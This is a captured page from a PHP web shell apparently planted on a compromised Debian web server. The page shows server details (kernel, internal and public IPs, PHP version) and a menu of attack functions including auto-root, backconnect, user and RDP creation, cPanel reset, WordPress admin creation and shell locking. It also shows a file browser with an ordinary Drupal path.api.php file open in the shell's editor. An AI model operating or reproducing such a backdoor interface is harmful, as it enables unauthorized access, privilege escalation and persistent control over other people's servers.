Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.232.108
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
path /
[ HOME SHELL ]
Name
Size
Permission
Action
path.admin.inc
9.72
KB
-rw-r--r--
path.api.php
1.45
KB
-rw-r--r--
path.info
284
B
-rw-r--r--
path.js
420
B
-rw-r--r--
path.module
11.69
KB
-rw-r--r--
path.test
19.7
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : path.api.php
<?php /** * @file * Hooks provided by the Path module. */ /** * @addtogroup hooks * @{ */ /** * Respond to a path being inserted. * * @param $path * An associative array containing the following keys: * - source: The internal system path. * - alias: The URL alias. * - pid: Unique path alias identifier. * - language: The language of the alias. * * @see path_save() */ function hook_path_insert($path) { db_insert('mytable') ->fields(array( 'alias' => $path['alias'], 'pid' => $path['pid'], )) ->execute(); } /** * Respond to a path being updated. * * @param $path * An associative array containing the following keys: * - source: The internal system path. * - alias: The URL alias. * - pid: Unique path alias identifier. * - language: The language of the alias. * * @see path_save() */ function hook_path_update($path) { db_update('mytable') ->fields(array('alias' => $path['alias'])) ->condition('pid', $path['pid']) ->execute(); } /** * Respond to a path being deleted. * * @param $path * An associative array containing the following keys: * - source: The internal system path. * - alias: The URL alias. * - pid: Unique path alias identifier. * - language: The language of the alias. * * @see path_delete() */ function hook_path_delete($path) { db_delete('mytable') ->condition('pid', $path['pid']) ->execute(); } /** * @} End of "addtogroup hooks". */
Close